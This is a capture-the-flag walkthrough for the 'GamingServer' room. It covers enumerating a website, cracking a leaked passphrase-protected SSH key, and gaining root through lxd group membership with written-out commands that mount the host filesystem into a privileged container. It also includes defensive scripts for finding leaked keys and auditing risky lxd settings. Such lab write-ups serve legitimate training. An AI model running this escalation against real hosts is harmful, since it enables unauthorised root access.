Room: GamingServer

Difficulty: Easy

An Easy Boot2Root box for beginners

Task 1 Boot2Root

Can you gain access to this gaming server built by amateurs with no experience of web development and take advantage of the deployment system.

Task 1.1 - What is the user flag?

REDACTED

I did my usual nmap scan: nmap -T4 -sC -sV <IP>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA)
|   256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA)
|_  256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: House of danak
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ports 22 and 80 are open; let's manually enumerate the website (interact with it and inspect the source code):

[image: website_main_page]

It looks like a gaming website.

[image: username]

We got a potential username; let's note it down and continue with our manual enumeration.

[image: uploads_dir]

/about.html leads to the /uploads directory, which contains some interesting files:

[image: password_list]

We got the Hacker Manifesto by The Mentor and a meme.jpg:

[image: meme]

OK, after taking some motivation and laughter, let's smash the room.

We also got a password file, ‘dict.lst’. I tried hydra on ssh using the information that we found (username: john, passwords: dict.lst) but got nothing, so let’s further enumerate the website to find out where we can use these:

Let’s do a gobuster scan: gobuster dir -u http://<IP>/ -w /usr/share/wordlists/dirb/common.txt -x txt,php,zip

/about.php (Status: 200)
/index.html (Status: 200)
/robots.txt (Status: 200)
/secret (Status: 301)
/server-status (Status: 403)
/uploads (Status: 301)

There’s a /secret directory; let's visit it:

[image: private_rsa_key]

We found an RSA private key, and it is password-protected (we know that because the key has these two lines in its header):

Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547
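The two header lines above are exactly what a defender can grep for when checking whether a key that leaked into a web root is at least passphrase-protected. The following is an added example, not part of the original writeup: a small scanner that walks a directory (for instance the web root), finds private keys, and reports whether each one is encrypted. For legacy PEM keys it uses the Proc-Type/DEK-Info headers; for OpenSSH-format keys it reads the cipher name stored in the key blob (a value of "none" means no passphrase). The sample keys are constructed filler, not real keys; the two header lines in the first sample are the ones quoted above.

```python
"""Find private keys under a directory and report whether they are passphrase-protected.
Added example for this writeup, not the room's or the author's code."""
import base64
import os
import re
import struct
from dataclasses import dataclass
from typing import List, Optional

BEGIN_RE = re.compile(r"-----BEGIN (?:(RSA|EC|DSA|OPENSSH|ENCRYPTED) )?PRIVATE KEY-----")
DEK_RE = re.compile(r"^DEK-Info:\s*([A-Za-z0-9-]+),", re.MULTILINE)


@dataclass
class KeyFinding:
    path: str
    kind: str                # RSA / EC / DSA / OPENSSH / ENCRYPTED (PKCS#8) / PKCS8
    encrypted: bool
    cipher: Optional[str]    # cipher named in the key, when the format records one


def _openssh_cipher(text: str) -> Optional[str]:
    """Return the cipher name stored in an OpenSSH-format key ("none" if unencrypted)."""
    body = "".join(line for line in text.splitlines() if not line.startswith("-----"))
    try:
        raw = base64.b64decode(body, validate=True)
    except ValueError:
        return None
    magic = b"openssh-key-v1\x00"
    if not raw.startswith(magic) or len(raw) < len(magic) + 4:
        return None
    off = len(magic)
    (n,) = struct.unpack(">I", raw[off:off + 4])   # first field: ciphername string
    return raw[off + 4:off + 4 + n].decode("ascii", "replace")


def inspect_key_text(path: str, text: str) -> Optional[KeyFinding]:
    """Classify one file's content; None if it does not contain a private key."""
    m = BEGIN_RE.search(text)
    if not m:
        return None
    kind = m.group(1) or "PKCS8"
    cipher, encrypted = None, False
    if kind in ("RSA", "EC", "DSA"):
        # Legacy PEM marks a passphrase with these two headers (as on the /secret key).
        dek = DEK_RE.search(text)
        encrypted = "Proc-Type: 4,ENCRYPTED" in text or dek is not None
        cipher = dek.group(1) if dek else None
    elif kind == "OPENSSH":
        cipher = _openssh_cipher(text)
        encrypted = cipher is not None and cipher != "none"
    elif kind == "ENCRYPTED":
        encrypted = True     # PKCS#8 encrypted keys announce it in the BEGIN line
    return KeyFinding(path, kind, encrypted, cipher)


def scan_tree(root: str, max_bytes: int = 64 * 1024) -> List[KeyFinding]:
    """Walk root and return findings for every readable file that holds a private key."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_bytes:
                    continue
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    text = fh.read()
            except OSError:
                continue
            finding = inspect_key_text(path, text)
            if finding:
                findings.append(finding)
    return sorted(findings, key=lambda f: f.path)


# Constructed samples (not real keys): headers as quoted in the writeup, filler body.
SAMPLE_LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----END RSA PRIVATE KEY-----
"""
SAMPLE_LEGACY_PLAIN = "-----BEGIN RSA PRIVATE KEY-----\nAAAA\n-----END RSA PRIVATE KEY-----\n"


def fake_openssh_key(cipher: str) -> str:
    """Build just enough of an OpenSSH key blob to exercise the parser (constructed)."""
    blob = b"openssh-key-v1\x00" + struct.pack(">I", len(cipher)) + cipher.encode()
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


if __name__ == "__main__":
    import sys
    for f in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "/var/www/html"):
        state = f"encrypted ({f.cipher})" if f.encrypted else "UNENCRYPTED"
        print(f"{f.path}: {f.kind} private key, {state}")
```

Run it against the web root (python3 scan.py /var/www/html); any hit is a finding regardless of encryption, since a short wordlist was enough to open this one, but an unencrypted key is the one to rotate first.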

Let's crack it with that password list:

[image: cracked_key]

Cool, we cracked the password; let's get into the system via ssh:

[image: we_are_in]

We can see that user ‘john’ is in the ‘sudo’ and ‘lxd’ groups, both potential privesc vectors. We don’t have john’s password on the system, so the ‘sudo’ route is out, but the system is Ubuntu 18.04, which means we can probably escalate privileges through the ‘lxd’ group membership that john has.

We got our user.txt in the home directory:

john@exploitable:~$ ls
user.txt
john@exploitable:~$ cat user.txt 
REDACTED
john@exploitable:~$

Task 1.2 - What is the root flag?

REDACTED

As we have seen, user ‘john’ is in the lxd group, which we can take advantage of to gain root.

Privilege Escalation

  • Download build-alpine on your machine from the git repository and run the build-alpine script to build the latest Alpine image as a tar.gz file (run as root):

    #!/bin/bash
    git clone https://github.com/saghul/lxd-alpine-builder.git
    cd lxd-alpine-builder
    ./build-alpine

  • Transfer the tar.gz file from the attacker machine to the target machine: I did it with a python3 HTTP server and wget.
  • After that, run the following commands to import, configure, start, and get a shell in the lxc container:

    #!/bin/bash
    lxc image import ./lxd-alpine.tar.gz --alias myimage
    lxc image list
    lxc init myimage gamingserver -c security.privileged=true
    lxc config device add gamingserver mydevice disk source=/ path=/mnt/root recursive=true
    lxc list
    lxc start gamingserver
    lxc exec gamingserver /bin/sh

Note: The host filesystem is mounted at /mnt/root inside the container (the path given in the lxc config device add command).
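From the blue-team side, the two things this escalation depends on are easy to audit: a non-root user sitting in the lxd (or sudo) group, and a container created with security.privileged=true that mounts the host's / as a disk device. The script below is an added example, not the room's or the author's code. It parses /etc/group and the JSON from `lxc list --format json`, flagging both conditions; the sample inputs are constructed to mirror what the writeup found (john in sudo and lxd; the gamingserver container), and the JSON field names (name, config, devices and their expanded_* variants) are assumed from LXD's instance JSON.

```python
"""Audit lxd/sudo group membership and risky LXD container settings.
Added example for this writeup; input samples below are constructed."""
import json
import os
import subprocess
from typing import Dict, List

RISKY_GROUPS = ("sudo", "lxd")


def parse_group_file(text: str) -> Dict[str, List[str]]:
    """Map group name -> member list from /etc/group content."""
    groups: Dict[str, List[str]] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        name, members = parts[0], parts[3]
        groups[name] = [m for m in members.split(",") if m]
    return groups


def risky_memberships(text: str) -> Dict[str, List[str]]:
    """Return only the risky groups that actually have members."""
    groups = parse_group_file(text)
    return {g: groups[g] for g in RISKY_GROUPS if groups.get(g)}


def audit_containers(lxc_json: str) -> List[str]:
    """One finding per privileged container or per disk device that exposes host /.
    Field names are assumed from `lxc list --format json` instance records."""
    findings = []
    for inst in json.loads(lxc_json):
        name = inst.get("name", "?")
        cfg = inst.get("expanded_config") or inst.get("config") or {}
        if str(cfg.get("security.privileged", "")).lower() == "true":
            findings.append(f"{name}: security.privileged=true")
        devs = inst.get("expanded_devices") or inst.get("devices") or {}
        for dev_name, dev in devs.items():
            if dev.get("type") == "disk" and dev.get("source") == "/":
                findings.append(f"{name}: device {dev_name} mounts host / at {dev.get('path')}")
    return findings


# Constructed /etc/group excerpt mirroring what the writeup observed for user john.
SAMPLE_GROUP = """root:x:0:
sudo:x:27:john
lxd:x:108:john
www-data:x:33:
"""

# Constructed `lxc list --format json` excerpt: the container built in the writeup plus a benign one.
SAMPLE_LXC_JSON = json.dumps([
    {"name": "gamingserver", "status": "Running",
     "config": {"security.privileged": "true"},
     "devices": {"mydevice": {"type": "disk", "source": "/", "path": "/mnt/root", "recursive": "true"},
                 "root": {"type": "disk", "path": "/", "pool": "default"}}},
    {"name": "web", "status": "Running", "config": {},
     "devices": {"root": {"type": "disk", "path": "/", "pool": "default"}}},
])


def audit_live_host() -> List[str]:
    """Run both checks on the current machine; falls back gracefully if lxc is absent."""
    report = []
    if os.path.exists("/etc/group"):
        with open("/etc/group") as fh:
            for group, members in risky_memberships(fh.read()).items():
                report.append(f"group {group}: {', '.join(members)}")
    try:
        out = subprocess.run(["lxc", "list", "--format", "json"],
                             capture_output=True, text=True, check=True).stdout
        report.extend(audit_containers(out))
    except (FileNotFoundError, subprocess.CalledProcessError):
        report.append("lxc not available or not runnable for this user")
    return report


if __name__ == "__main__":
    for line in audit_live_host():
        print(line)
```

The fix on a real host is the same in both directions: take unprivileged accounts out of the lxd group (gpasswd -d john lxd), and treat any privileged container with a disk device whose source is / as equivalent to root on the host.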

[image: lxc]

That is all for this room, I hope you enjoyed it, happy hacking 🔥

Resources